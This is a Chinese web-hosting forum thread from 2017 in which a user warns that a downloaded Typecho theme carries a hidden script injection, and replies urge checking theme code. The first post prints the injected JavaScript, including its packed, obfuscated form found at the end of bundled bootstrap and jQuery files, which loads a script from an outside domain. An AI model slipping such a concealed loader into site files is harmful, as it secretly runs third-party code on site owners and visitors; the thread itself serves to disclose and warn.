全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

IP归属甄别会员请立即修改密码
查看: 3780|回复: 16
打印 上一主题 下一主题

[经验] 各位一定要小心主题挂马……不管你是哪里下载到的主题。

[复制链接]
跳转到指定楼层
1#
发表于 2017-6-4 17:32:37 来自手机 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
https://github.com/Deerweak/deerweak/issues/1
这个叫做Deerweak的typecho主题挺漂亮,于是我就下下来用了。
但是检查源代码时发现一件十分可疑的事情。浏览器执行了这么一段JS。

if(window.location.host!=="lvlvl.cn"){document.write("<\script type='text/javascript' src='//lvlvl.cn/usr/deerweak/js/trla.js'></script>")}
最终指向文件:https://krait.cn/usr/deerweak/js/trla.js

并且该资源为404,造成长时间等待。并且仔细查找后并没有在php文件中找到插入来源,细思恐极。于是深入检查,最后在"bootstrap.min.js"和“jquery-2.1.1.min.js"中的最后一行发现了被加密的插入指令。

原代码如下:

urn p}('4(8.5.f!=="1.2"){6.7("<\0 9='a/b' c='//1.2/d/e/3/g.3'\><\/0\>")}',17,17,'script|lvlvl|cn|js|if|location|document|write|window|type|text|javascript|src|usr|deerweak|host|trla'.split('|')

我很想知道作者用意何在,这样挂马是不是有点小可爱了……
推荐
 楼主| 发表于 2017-6-4 17:34:09 来自手机 | 只看该作者
不管你搞了啥主题插件,记得挡一眼代码看看有没有啥可疑的东西。再懒也要F12看看有没有奇怪的资源加载进去了。太可怕了。
3#
发表于 2017-6-4 17:38:27 来自手机 | 只看该作者
说的很对,谢谢提醒
4#
发表于 2017-6-4 17:40:11 | 只看该作者
放到开源库里就有点意思了
5#
发表于 2017-6-4 17:45:07 | 只看该作者
大猫 发表于 2017-6-4 17:40
放到开源库里就有点意思了

看来哪儿下载的东西都不能让人100%放心
6#
 楼主| 发表于 2017-6-4 17:47:00 来自手机 | 只看该作者
vultrlinode 发表于 2017-6-4 17:45
看来哪儿下载的东西都不能让人100%放心

开源的东西你好歹还能自己看看代码,那些编译好的,有加密的 才害怕。
7#
发表于 2017-6-4 17:51:10 | 只看该作者
有加密的   不敢用
8#
发表于 2017-6-4 17:52:48 来自手机 | 只看该作者
是的 有的主题被修改的无可言喻
9#
发表于 2017-6-4 17:53:57 | 只看该作者
这么说不敢随便下载了
10#
发表于 2017-6-4 18:09:02 | 只看该作者
萌新表示, nginx+html 路过……

主题跟我没关系了……
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-11-2 14:49 , Processed in 0.082072 second(s), 10 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表